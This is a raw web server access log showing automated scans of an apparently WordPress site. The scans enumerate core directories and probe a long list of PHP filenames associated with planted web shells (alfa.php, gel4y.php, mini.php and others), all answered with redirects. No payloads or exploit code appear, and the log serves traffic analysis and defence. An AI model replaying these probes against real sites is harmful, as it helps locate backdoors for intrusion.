159.65.155.99 - - [11/Aug/2025:21:03:41 +0300] "GET /wp-admin/css/colors/ocean/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:03:59 +0300] "GET /wp-admin/css/colors/sunrise/%20 HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:04:30 +0300] "GET /wp-admin/images/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:04:45 +0300] "GET /wp-admin/js/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:04:55 +0300] "GET /wp-admin/js/widgets/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
193.32.162.204 - - [11/Aug/2025:20:45:20 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Safari/605.1.15"
159.65.155.99 - - [11/Aug/2025:20:59:18 +0300] "GET /wp-admin/css/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:20:59:34 +0300] "GET /wp-content/uploads/2025/08/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:20:59:55 +0300] "GET /wp-content/uploads/2025/07/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:00:38 +0300] "GET /wp-content/languages/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:00:46 +0300] "GET /wp-admin/includes/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:00:59 +0300] "GET /wp-admin/maint/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:01:10 +0300] "GET /wp-admin/network/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:01:21 +0300] "GET /wp-admin/user/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:01:36 +0300] "GET /wp-admin/css/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:02:39 +0300] "GET /wp-admin/css/colors/ectoplasm/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:02:52 +0300] "GET /wp-admin/css/colors/light/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:03:10 +0300] "GET /wp-admin/css/colors/midnight/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:05:20 +0300] "GET /wp-includes/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:05:42 +0300] "GET /wp-includes/block-editor.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:06:45 +0300] "GET /wp-includes/class-wp-block-bindings-registry.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:07:00 +0300] "GET /wp-includes/class-wp-block-bindings-source.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:07:56 +0300] "GET /wp-includes/class-wp-block-parser-frame.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:08:07 +0300] "GET /wp-includes/class-wp-block-template.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:08:22 +0300] "GET /wp-includes/class-wp-block-templates-registry.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:08:52 +0300] "GET /wp-includes/class-wp-dependencies.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:09:22 +0300] "GET /wp-includes/class-wp-exception.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:09:31 +0300] "GET /wp-includes/class-wp-http.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:09:39 +0300] "GET /wp-includes/class-wp-navigation-fallback.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:09:53 +0300] "GET /wp-includes/class-wp-phpmailer.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:10:50 +0300] "GET /wp-includes/class-wp-speculation-rules.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:11:04 +0300] "GET /wp-includes/class-wp-styles.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:11:16 +0300] "GET /wp-includes/class-wp-textdomain-registry.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:11:50 +0300] "GET /wp-includes/class-wp-theme-json-resolver.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:12:24 +0300] "GET /wp-includes/class-wp-token-map.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:12:49 +0300] "GET /wp-includes/class-wpdb.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:12:59 +0300] "GET /wp-includes/fonts.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:13:09 +0300] "GET /wp-includes/global-styles-and-settings.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
185.241.208.231 - - [11/Aug/2025:21:13:37 +0300] "GET /wp-admin/css/colors/blue/index.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:13:40 +0300] "GET /wp-includes/https-migration.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:13:53 +0300] "GET /wp-includes/robots-template.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:14:28 +0300] "GET /wp-includes/speculative-loading.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:14:45 +0300] "GET /wp-includes/style-engine.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:15:00 +0300] "GET /wp-includes/template-canvas.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:15:17 +0300] "GET /wp-includes/theme-previews.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:15:39 +0300] "GET /wp-includes/ID3/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:15:53 +0300] "GET /wp-includes/ID3/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:16:23 +0300] "GET /wp-includes/PHPMailer/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:16:42 +0300] "GET /wp-includes/PHPMailer/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:17:03 +0300] "GET /wp-includes/Text/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:12:35 +0300] "GET /wp-includes/class-wp-url-pattern-prefixer.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:13:22 +0300] "GET /wp-includes/https-detection.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:14:05 +0300] "GET /wp-includes/script-modules.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:15:29 +0300] "GET /wp-includes/theme-templates.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:16:06 +0300] "GET /wp-includes/IXR/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:17:20 +0300] "GET /wp-includes/Text/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:17:35 +0300] "GET /wp-includes/Text/Diff/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:18:05 +0300] "GET /wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:18:54 +0300] "GET /wp-includes/blocks/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:19:32 +0300] "GET /wp-includes/pomo/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:19:48 +0300] "GET /wp-includes/sitemaps/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:20:24 +0300] "GET /wp-includes/sitemaps/providers/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:20:58 +0300] "GET /wp-includes/widgets/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:21:12 +0300] "GET /wp-includes/widgets/class-wp-widget-block.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:21:24 +0300] "GET /wp-includes/css/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:21:41 +0300] "GET /wp-includes/css/dist/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:22:16 +0300] "GET /wp-includes/fonts/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:22:48 +0300] "GET /wp-includes/fonts/class-wp-font-face-resolver.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
102.212.247.75 - - [11/Aug/2025:21:22:55 +0300] "GET /.well-known/pki-validation/ HTTP/1.1" 301 795 "-" "get_local:DCV"
102.212.247.75 - - [11/Aug/2025:21:23:04 +0300] "GET /.well-known/pki-validation/xmrlpc.php%3fp= HTTP/1.1" 301 795 "-" "get_local:DCV"
159.65.155.99 - - [11/Aug/2025:21:23:11 +0300] "GET /wp-includes/fonts/class-wp-font-library.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:24:56 +0300] "GET /wp-includes/images/wlw/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:25:15 +0300] "GET /wp-includes/js/%20 HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:25:28 +0300] "GET /wp-includes/js/codemirror/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:25:53 +0300] "GET /.well-known/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
52.178.137.1 - - [11/Aug/2025:22:04:30 +0300] "GET /.alf.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:31 +0300] "GET /.bod/.ll/ss.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:31 +0300] "GET /.well-known/about/function.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:31 +0300] "GET /.well-known/classwithtostring.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:32 +0300] "GET /.well-known/index.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:32 +0300] "GET /.well-known/radio.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:32 +0300] "GET /10.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:32 +0300] "GET /12.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:32 +0300] "GET /13k.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:33 +0300] "GET /87.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:33 +0300] "GET /about.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:33 +0300] "GET /about/Geforce.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:33 +0300] "GET /about/function.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:34 +0300] "GET /admin.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:34 +0300] "GET /admin/admin.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:34 +0300] "GET /admin/function.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:35 +0300] "GET /admin/index.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:35 +0300] "GET /adminfuns.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:35 +0300] "GET /akc.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:36 +0300] "GET /al.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:36 +0300] "GET /alfa.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:36 +0300] "GET /as.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:36 +0300] "GET /asasx.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:37 +0300] "GET /assets/images/doc.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:37 +0300] "GET /atomlib.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:37 +0300] "GET /auth.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:37 +0300] "GET /autoload_classmap.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:38 +0300] "GET /autoload_classmap/function.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:38 +0300] "GET /b.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:38 +0300] "GET /blog/fw.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:39 +0300] "GET /bugz.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:39 +0300] "GET /byp.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:39 +0300] "GET /cc.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:40 +0300] "GET /chosen.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:41 +0300] "GET /class.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:41 +0300] "GET /classwithtostring.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:42 +0300] "GET /composer.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:42 +0300] "GET /css.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:42 +0300] "GET /dropdown.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:42 +0300] "GET /edit.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:43 +0300] "GET /f35.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:43 +0300] "GET /file.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:43 +0300] "GET /file2.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:43 +0300] "GET /filemanager.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:43 +0300] "GET /files/index.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:44 +0300] "GET /fix.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:44 +0300] "GET /flower.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:44 +0300] "GET /fox.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:44 +0300] "GET /function/function.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:45 +0300] "GET /g.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:45 +0300] "GET /gecko.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:45 +0300] "GET /gel4y.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:45 +0300] "GET /gelay.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:46 +0300] "GET /gg.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:46 +0300] "GET /goat.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:46 +0300] "GET /goods.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:47 +0300] "GET /h.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:47 +0300] "GET /images/admin.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:48 +0300] "GET /images/class-config.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:48 +0300] "GET /inc.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:48 +0300] "GET /index.bak.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:48 +0300] "GET /index/function.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:49 +0300] "GET /info.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:49 +0300] "GET /infos.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:49 +0300] "GET /ioxi-o.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:50 +0300] "GET /k.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:50 +0300] "GET /m.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:50 +0300] "GET /mar.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:50 +0300] "GET /mini HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:51 +0300] "GET /mini.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:51 +0300] "GET /mm.php HTTP/1.1" 301 795 "-" "-"
52.178.137.1 - - [11/Aug/2025:22:04:52 +0300] "GET /ms-edit.php HTTP/1.1" 301 795 "-" "-"
